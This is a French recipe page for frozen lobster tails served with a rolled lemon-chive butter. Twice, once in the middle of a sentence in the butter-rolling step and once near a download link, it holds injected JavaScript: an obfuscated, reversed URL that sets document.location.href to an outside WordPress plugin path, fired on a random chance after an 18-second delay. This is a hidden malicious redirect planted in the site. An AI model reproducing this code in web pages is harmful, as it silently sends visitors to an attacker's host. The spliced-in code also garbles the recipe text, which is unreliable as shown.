QUEUES DE LANGOUSTE AU BEURRE CITRON-CIBOULETTE

QUEUES DE LANGOUSTE AU BEURRE CITRON-CIBOULETTE

Pour 4 pers.

INGRÉDIENTS :

– 4 queues de langouste congelées
– 80g de beurre ramolli
– 2 CS de ciboulette ciselée
– ½ cc de zeste de citron
– sel / poivre
– 1 CS d’huile d’olive

Dans un bol, “travailler” le beurre avec les autres ingrédients.


Déposer le mélange sur une feuille de papier sulfurisé et rouler le papier autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour du beurre en serrant bien pour former un boudin.


Tourner les extrémités comme pour emballer un bonbon. mettre au frais pendant 4 heures au minimum.


Enduire les queues de langoustes encore congelées avec l’huile d’olive et cuire selon les indications du paquet (environ 40 minutes)


Dresser les langoustes sur les assiettes de service, couper le beurre en rondelles epaisses et en deposer 2 ou 3 sur chaque queue.


Servir immédiatement.

MENU BE HARMONY NOEL 2020toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton” download>Télécharger

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